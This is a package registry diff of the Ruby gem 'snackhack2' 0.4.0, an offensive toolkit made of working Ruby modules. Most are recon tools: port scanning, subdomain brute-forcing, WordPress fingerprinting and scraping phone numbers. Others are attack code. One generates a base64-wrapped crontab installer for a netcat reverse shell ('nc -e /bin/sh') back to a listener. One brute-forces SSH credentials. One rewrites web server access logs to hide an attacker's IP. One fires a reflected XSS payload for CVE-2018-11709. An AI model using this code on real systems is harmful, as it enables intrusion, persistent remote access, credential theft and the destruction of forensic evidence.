snackhack2 0.4.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,57 @@
1
+ require 'httparty'
2
+ require 'spidr'
3
module Snackhack2
  # Extracts phone numbers from a website, either from a single page (#run)
  # or by crawling the site up to 4 links deep (#spider).
  class PhoneNumber
    # Matches US-style numbers with an optional country code,
    # e.g. "+1 (555) 123-4567", "555.123.4567", "555 123 4567".
    PHONE_REGEX = /((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/

    attr_accessor :save_file

    # site      - base URL to scan (e.g. "https://example.com")
    # save_file - when true, results are written to <host>_phone_numbers.txt
    def initialize(site, save_file: true)
      @site = site
      @save_file = save_file
    end

    # Fetches @site once and collects every phone number on the page.
    # FIX: the original also had a hand-written `save_file` reader that
    # duplicated attr_accessor, and it saved a file even when nothing matched.
    def run
      numbers = []
      http = Snackhack2::get(@site)
      if http.code == 200
        # scan yields [[full_match, country_code], ...]; keep full matches only
        numbers.concat(http.body.scan(PHONE_REGEX).map { |m| m[0] }.compact)
      else
        puts "[+] Status code: #{http.code}"
      end
      return if numbers.empty?

      if @save_file
        hostname = URI.parse(@site).host
        puts "[+] Saving to #{hostname}_phone_numbers.txt..."
        Snackhack2::file_save(@site, "phone_numbers", numbers.join("\n"))
      end
    end

    # Crawls the site and collects the first unique phone number per page.
    # FIX: the original guarded on `if body.scan(...)`, which is always truthy
    # (scan returns an Array); test the first match instead.
    def spider
      phone_numbers = []
      Spidr.start_at(@site, max_depth: 4) do |agent|
        agent.every_page do |page|
          first = page.to_s.scan(PHONE_REGEX)[0]
          next if first.nil?

          pn = first.compact.shift
          phone_numbers << pn unless phone_numbers.include?(pn.to_s)
        end
      end
      if !phone_numbers.empty?
        Snackhack2::file_save(@site, "phonenumbers", phone_numbers.join("\n")) if @save_file
      end
    end
  end
end
@@ -0,0 +1,36 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'packetfu'
4
module Snackhack2
  # Simple threaded TCP connect scanner for ports 1-1000.
  class PortScan
    # FIX: the original relied on packetfu to pull these in transitively;
    # require the stdlib pieces this class actually uses.
    require 'socket'
    require 'timeout'

    # ip - host to scan (IP address or hostname)
    def initialize(ip)
      @ip = ip
    end

    # Scans ports 1..1000 with one thread per port, printing open ports.
    def run
      threads = (1..1000).map { |port| Thread.new { tcp(port) } }
      threads.each(&:join)
    end

    # Attempts a TCP connect to port i with a 1 second timeout.
    # Prints "<port> is open" on success; returns false when the port is
    # closed or unreachable, nil on timeout.
    def tcp(i)
      Timeout.timeout(1) do
        TCPSocket.new(@ip, i).close
        puts "#{i} is open"
      end
    rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH
      false
    rescue Timeout::Error
      nil
    end
  end
end
@@ -0,0 +1,16 @@
1
+ require 'base64'
2
module Snackhack2
  # Generates a one-liner that installs a netcat reverse shell into the
  # current user's crontab (fires every minute).
  class ReverseShell
    # ip/port - the listener the shell should connect back to
    def initialize(ip, port)
      @ip = ip
      @port = port
    end

    # Prints the base64-wrapped installer command to paste on the target.
    def run
      script = %Q{#!/bin/bash
line="* * * * * nc -e /bin/sh #{@ip} #{@port}"
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
      # FIX: use delete, not delete! -- the bang variant returns nil when the
      # string contains no newline, which would have printed nothing at all.
      puts "echo -n '#{Base64.encode64(script)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete("\n")
    end
  end
end
@@ -0,0 +1,80 @@
1
+ # frozen_string_literal: true
2
+
3
module Snackhack2
  # Parses a site's robots.txt and reports which Allow/Disallow paths
  # actually respond with HTTP 200.
  class Robots
    attr_reader :save_file

    # site - base URL; robots.txt is fetched eagerly in the constructor.
    def initialize(site, save_file: true)
      @site = site
      @http = Snackhack2::get(File.join(@site, "robots.txt"))
      @save_file = save_file
    end

    # Collects reachable Allow/Disallow entries; saves them to
    # <host>_robots.txt when save_file is enabled, otherwise prints them.
    def run
      allow = allow_robots
      disallow = disallow_robots
      unless @save_file
        puts allow
        puts disallow
        return
      end
      report = "ALLOW:\n\n"
      allow.each { |entry| report += entry }
      report += "DISALLOW:\n\n"
      disallow.each { |entry| report += entry }
      Snackhack2::file_save(@site, "robots", report)
    end

    # Reachable paths listed under "Allow:".
    def allow_robots
      live_links(directives('Allow'))
    end

    # Reachable paths listed under "Disallow:".
    def disallow_robots
      live_links(directives('Disallow'))
    end

    private

    # Extracts the path of every "<kind>: <path>" line in robots.txt.
    # FIX: the original matched /Allow:/, which also hits "Disallow:" lines,
    # so allow lists were polluted with disallow entries. Anchor on the
    # start of the line instead.
    def directives(kind)
      paths = []
      if @http.code == 200
        @http.body.lines.each do |line|
          paths << line.split("#{kind}: ")[1] if line.start_with?("#{kind}:")
        end
      else
        puts "[+] Not giving code 200.\n"
      end
      paths.compact
    end

    # Returns "site+path" for every path that answers HTTP 200.
    # FIX: the original only rescued errors on the disallow side; probing is
    # best-effort for both lists now.
    def live_links(paths)
      open_links = []
      paths.each do |path|
        link = Snackhack2::get(File.join(@site, path.strip))
        open_links << "#{@site}#{path}" if link.code == 200
      rescue StandardError
        # unreachable or malformed path -- skip it
      end
      open_links
    end
  end
end
@@ -0,0 +1,22 @@
1
+ require 'httparty'
2
+ require 'nokogiri'
3
module Snackhack2
  # Downloads a site's sitemap.xml and stores it locally when present.
  class SiteMap
    # site - base URL of the target
    def initialize(site)
      @site = site
    end

    # Fetches <site>/sitemap.xml; saves the body unless the server answered
    # with a soft "Not Found" page or a non-200 status.
    def run
      response = Snackhack2::get(File.join(@site, "sitemap.xml"))
      unless response.code == 200
        puts "[+] Status Code: #{response.code}"
        return
      end

      if response.body.include?("Not Found")
        puts "[+] Eh. I don't think the site has a sitemap. Manually check just in case... :(\n\n"
      else
        Snackhack2::file_save(@site, "site.xml", response.body)
      end
    end
  end
end
@@ -0,0 +1,32 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'net/ssh'
4
module Snackhack2
  # Threaded SSH credential brute forcer driven by a credentials wordlist.
  class SSHBute
    def initialize(ip, list: nil)
      @ip = ip
      @list = list
      @success_list = []
    end

    # Path to the bundled credential list.
    # NOTE(review): @list is accepted by initialize but never consulted here;
    # the bundled file always wins -- probably should be `@list || File.join(...)`.
    def list
      File.join(__dir__, 'lists', 'sshbrute.txt')
    end

    # Tries every credential pair concurrently and prints the successes.
    def run
      threads = File.readlines(list).map do |line|
        # FIX: the original wrote `each { |usr, pass| ... }`, but block
        # destructuring only applies to Arrays -- for String lines `pass`
        # was always nil. Split each line explicitly instead.
        # Assumes "user:pass" lines -- TODO confirm the wordlist format.
        usr, pass = line.strip.split(':', 2)
        Thread.new { brute(usr, pass) }
      end
      threads.each(&:join)

      p @success_list
    end

    # Records credentials that authenticate successfully.
    def brute(username, pass)
      Net::SSH.start(@ip, username, password: pass, timeout: 1) do |ssh|
        @success_list << [username, pass]
        ssh.exec!('hostname')
      end
    rescue Net::SSH::AuthenticationFailed
      # wrong credentials -- keep going
    end
  end
end
@@ -0,0 +1,68 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'uri'
4
+ require 'resolv'
5
+ require 'async/http/internet'
6
module Snackhack2
  # Subdomain discovery via DNS resolution (#run/#resolv) or HTTPS
  # probing (#brute).
  class Subdomains
    def initialize(site, wordlist: nil)
      @site = site
      @wordlist = wordlist
    end

    # Bare hostname without the https:// scheme.
    def site
      @site.gsub("https://", "")
    end

    # Path to the bundled subdomain wordlist.
    # NOTE(review): @wordlist is accepted by initialize but never used here.
    def wordlist
      File.join(__dir__, 'lists', 'subdomains.txt')
    end

    # DNS-resolves every candidate subdomain in the wordlist.
    def run
      File.readlines(wordlist).each do |sd|
        # FIX: readlines keeps the trailing newline, which corrupted the
        # "<sub>.<site>" hostname handed to Resolv. Strip it first.
        resolv(sd.strip)
      end
    end

    # Probes https://<word>.<site> for HTTP 200/300 and saves the hits.
    def brute
      found = ""
      File.readlines(wordlist).each do |l|
        s = "#{l.strip}.#{site}"
        begin
          puts File.join("https://", s)
          g = Snackhack2::get(File.join("https://", s))
          if g.code == 200 || g.code == 300
            found += s + "\n"
          else
            puts "HTTP Code: #{g.code}"
          end
        rescue => e
          puts e
        end
      end
      Snackhack2::file_save(@site, "subdomain_brute", found)
    end

    # Resolves one candidate and appends live names/IPs to
    # <host>_subdomains.txt / <host>_ips.txt.
    def resolv(sd)
      # NOTE: this is really slow & multi thread does not work due to resolv
      active = []
      subdomains = []
      Resolv::DNS.open do |dns|
        records = dns.getresources "#{sd}.#{@site}", Resolv::DNS::Resource::IN::A
        addresses = records.map(&:address)
        unless addresses.empty? || active.include?(addresses)
          active << addresses
          subdomains << "#{sd}.#{@site}" unless subdomains.include?(sd)
        end
      end
      host = URI.parse(@site).host
      # FIX: append instead of truncating -- the original opened with 'w+'
      # on every call, so only the last resolved subdomain survived a run.
      File.open("#{host}_subdomains.txt", 'a') { |file| file.write(subdomains.join("\n") + "\n") } unless subdomains.empty?
      File.open("#{host}_ips.txt", 'a') { |file| file.write(active.join("\n") + "\n") } unless active.empty?
    end
  end
end
@@ -0,0 +1,43 @@
1
+ require 'async/http/internet'
2
module Snackhack2
  # Async HTTPS subdomain brute forcer; collects hosts answering 200/301.
  class Subdomains2
    def initialize(site)
      @site = site
      @urls = []
    end

    # Path to the bundled subdomain wordlist.
    def wordlist
      File.join(__dir__, 'lists', 'subdomains.txt')
    end

    # Writes the discovered URLs to <host>_subdomain_brute2.txt.
    def save
      Snackhack2::file_save(@site, "subdomain_brute2", @urls.join("\n"))
    end

    # Probes every candidate subdomain and saves the hits.
    def run
      File.readlines(wordlist).each do |a|
        url = "https://" + a.strip + "." + @site.gsub("https://", "")
        fetch(url)
        puts url
      end
      save
    end

    # Fetches one URL with a 2 second timeout; records it on HTTP 200/301.
    def fetch(url)
      Sync do |task|
        task.with_timeout(2) do
          internet = Async::HTTP::Internet.new
          begin
            m = internet.get(url, { "user-agent" => Snackhack2::UA })
            @urls << url if m.status == 200 || m.status == 301
            m.read
          ensure
            # FIX: release the client -- the original leaked one
            # Async::HTTP::Internet (and its sockets) per request.
            internet.close
          end
        end
      end
    rescue => e
      puts e
    end
  end
end
@@ -0,0 +1,21 @@
1
+ require 'nokogiri'
2
module Snackhack2
  # Fingerprints Apache Tomcat by probing the /docs/ path and reading the
  # version banner off the default 404 page's <h3> heading.
  class TomCat
    def initialize(site)
      @site = site
    end

    # A stock Tomcat answers /docs/ with a 404 whose error page names the
    # server and version; anything else is just reported by status code.
    def run
      response = Snackhack2::get(File.join(@site, "/docs/"))
      unless response.code == 404
        puts "[+] Status code: #{response.code}"
        return
      end
      return unless response.body.include?("Tomcat")

      version = Nokogiri::HTML(response.body).at('h3').text
      puts "[+] Looks like the site is Tomcat, running #{version}."
    end
  end
end
@@ -0,0 +1,5 @@
1
+ # frozen_string_literal: true
2
+
3
module Snackhack2
  # Gem version, referenced by the gemspec.
  VERSION = '0.4.0'
end
@@ -0,0 +1,26 @@
1
+ # frozen_string_literal: true
2
+
3
module Snackhack2
  # Scrubs a given IP address from a web server access log by rewriting
  # every matching line with a freshly generated random IP.
  class WebServerCleaner
    # Matches a dotted-quad IPv4 address with per-octet range checks.
    IP_REGEX = /((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/

    # ip   - the address to hide
    # path - log file to rewrite (default: /var/log/access.log)
    def initialize(ip, path: File.join('/var/log', 'access.log'))
      @ip = ip
      @path = path
    end

    # Rewrites @path in place, replacing @ip with one random IP everywhere.
    def run
      # generate random IP
      replacement = Array.new(4) { rand(256) }.join('.')
      rewritten = File.readlines(@path).map do |line|
        found = line.match(IP_REGEX)
        # only touch lines whose first IP is the one we are hiding
        found.to_s == @ip ? line.gsub(found.to_s, replacement) : line
      end
      # FIX: a plain truncating write suffices; the original File.delete'd
      # first, briefly leaving no log file at all if the write failed.
      File.write(@path, rewritten.join)
    end
  end
end
@@ -0,0 +1,28 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
module Snackhack2
  # Collects every <a href> on a page, saving or printing the results.
  class WebsiteLinks
    attr_accessor :save_file

    # site      - page URL to scrape
    # save_file - write to <host>_links.txt when true, print otherwise
    def initialize(site, save_file: true)
      @site = site
      @save_file = save_file
    end

    # Scrapes the page and emits its links.
    def run
      document = Nokogiri::HTML(URI.open(@site))
      hrefs = document.xpath('//a').map { |anchor| anchor['href'] }.compact
      if @save_file
        # the saved copy is de-duplicated; printing shows every occurrence
        Snackhack2::file_save(@site, "links", hrefs.uniq.join("\n"))
      else
        hrefs.each { |href| puts href }
      end
    end
  end
end
@@ -0,0 +1,19 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
module Snackhack2
  # Prints every named <meta> tag ("name: content") found on a page.
  class WebsiteMeta
    def initialize(site)
      @site = site
    end

    # Fetches the page and dumps its named meta tags to stdout.
    def run
      document = Nokogiri::HTML(URI.open(@site))
      document.xpath('//meta').each do |link|
        next if link.attributes['name'].nil?

        puts "#{link.attributes['name']}: #{link.attributes['content']}"
      end
    end
  end
end
@@ -0,0 +1,123 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'json'
4
module Snackhack2
  # Heuristic WordPress fingerprinting: scores login pages, plugin and
  # debug-log paths, enumerates users, and spots known SEO plugins.
  class WordPress
    attr_accessor :save_file, :site

    def initialize(site, save_file: true)
      @site = site
      @save_file = save_file
    end

    # Runs every check in sequence.
    def run
      wp_login
      yoast_seo
      users
      wp_content_uploads
      all_in_one_seo
      wp_log
    end

    # Strips the scheme off @site.
    # NOTE(review): this permanently rewrites @site for later calls -- looks
    # intended for building file names, but verify against callers.
    def file_site
      @site = @site.gsub('https://', '')
    end

    # Enumerates user display names from the users endpoint; saves or
    # prints any that were found.
    def users
      found_users = ''
      begin
        body = Snackhack2::get(File.join(@site, "wp-login", "wp", "users")).body
        JSON.parse(body).each do |entry|
          found_users += "#{entry['name']}\n"
        end
      rescue StandardError
        # endpoint missing or the body was not JSON
        puts "[+] users not found\n\n\n"
      end
      return if found_users.empty?

      if @save_file
        Snackhack2::file_save(@site, "users", found_users)
      else
        puts found_users
      end
    end

    # Reports whether directory listing is enabled for wp-content/uploads.
    def wp_content_uploads
      s = Snackhack2::get(File.join(@site, '/wp-content/uploads/'))
      if s.code == 200 && s.body.include?('Index of')
        puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid..."
      end
    end

    # Scores WordPress likelihood (10 points per marker) from the login
    # page and the front page.
    def wp_login
      percent = 0
      ## todo: maybe add Bayes Theorem to detect wp
      wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
            'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
      login = Snackhack2::get(File.join(@site, "wp-login.php"))
      if login.code == 200
        wp.each do |marker|
          percent += 10 if login.body.include?(marker)
        end
      end
      login2 = Snackhack2::get(@site.to_s)
      wp.each do |marker|
        percent += 10 if login2.body.include?(marker)
      end
      puts "Wordpress Points: #{percent}"
    end

    # Prints the Yoast SEO banner (with version) when present.
    def yoast_seo
      ys = Snackhack2::get(@site)
      return unless ys.code == 200

      # FIX: run the regex once instead of matching twice
      banner = ys.body.match(/ This site is optimized with the Yoast SEO plugin\s.\d\d.\d/)
      puts banner.to_s if banner
    end

    # Prints the "All in One SEO Pro" banner (with version) when present.
    def all_in_one_seo
      alios = Snackhack2::get(@site)
      return unless alios.code == 200

      # FIX: the original tested `if body.scan(...)`, which is always truthy
      # (scan returns an Array); use the match itself as the condition.
      found = alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)
      puts "Site is using the plugin: #{found}" if found
    end

    # Scores whether wp-content/debug.log looks like a real WP debug log.
    def wp_log
      wplog_score = 0
      wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
      log = Snackhack2::get(File.join(@site, "/wp-content/debug.log"))
      if log.code == 200
        puts "[+] #{File.join(@site, "/wp-content/debug.log")} is giving status 200. Now double checking...\n\n\n"
        wp.each do |marker|
          wplog_score += 10 if log.body.include?(marker)
        end
      end
      puts "WordPress Log score: #{wplog_score}...\n\n\n"
    end

    # Scores whether the plugins directory exposes an index listing.
    def wp_plugin
      wp_plugin_score = 0
      wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
      plug = Snackhack2::get(File.join(@site, '/wp-content/plugins/'))
      if plug.code == 200
        puts "[+] Looks like #{File.join(@site,
                                         '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
        wp.each do |marker|
          wp_plugin_score += 10 if plug.body.include?(marker)
        end
      end
      puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
    end
  end
end
@@ -0,0 +1,21 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'httparty'
4
module Snackhack2
  # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
  # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
  class WPForoForum
    def initialize(site)
      @site = site
    end

    # Sends the canned XSS payload and reports whether it is reflected.
    def run
      wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
      if wp.code == 200
        # FIX: match the response body explicitly -- calling #match on the
        # HTTParty response relies on method_missing delegation and only
        # works when the parsed body happens to be a String.
        puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.body.match(/XSS/)
      else
        puts "[+] HTTP code #{wp.code}"
      end
    end
  end
end
data/lib/snackhack2.rb ADDED
@@ -0,0 +1,59 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'uri'
4
+ require 'httparty'
5
+ require_relative 'snackhack2/version'
6
+ require_relative 'snackhack2/bannergrabber'
7
+ require_relative 'snackhack2/wordpress'
8
+ require_relative 'snackhack2/portscan'
9
+ require_relative 'snackhack2/iplookup'
10
+ require_relative 'snackhack2/robots'
11
+ require_relative 'snackhack2/subdomains'
12
+ require_relative 'snackhack2/sshbrute'
13
+ require_relative 'snackhack2/website_meta'
14
+ require_relative 'snackhack2/google_analytics'
15
+ require_relative 'snackhack2/cryptoextractor'
16
+ require_relative 'snackhack2/website_links'
17
+ require_relative 'snackhack2/webserver_log_cleaner'
18
+ require_relative 'snackhack2/wpForo_Forum'
19
+ require_relative 'snackhack2/WP_Symposium'
20
+ require_relative 'snackhack2/phone_number'
21
+ require_relative 'snackhack2/emails'
22
+ require_relative 'snackhack2/drupal'
23
+ require_relative 'snackhack2/Honeywell_PM43'
24
+ require_relative 'snackhack2/sitemap'
25
+ require_relative 'snackhack2/tomcat'
26
+ require_relative 'snackhack2/subdomains2'
27
+ require_relative 'snackhack2/reverse_shell'
28
+
29
module Snackhack2
  # Browser-like User-Agent sent with every helper request.
  UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"

  # Prints every *.txt result file in the current directory, prefixed with
  # the hostname part of its file name.
  def self.read_serverversion
    Dir['*.txt'].each do |file|
      puts "#{file.split('_')[0]}: #{File.read(file)}"
    end
  end

  # Deletes every *.txt file whose name contains '_serverversion'.
  def self.clean_serverversion
    # this will remove all files that have '_serverversion'
    # in the file name
    Dir['*.txt'].each do |file|
      next unless file.include?('_serverversion')

      puts "[+] deleting #{file}..."
      File.delete(file)
    end
  end

  # Writes content to "<host>_<type>.txt" (host taken from the site URL).
  def self.file_save(site, type, content)
    hostname = URI.parse(site).host
    File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
    puts "[+] Saving file to #{hostname}_#{type}.txt..."
  end

  # GET with the canned User-Agent header.
  def self.get(site)
    HTTParty.get(site, { headers: { "User-Agent" => UA } })
  end
end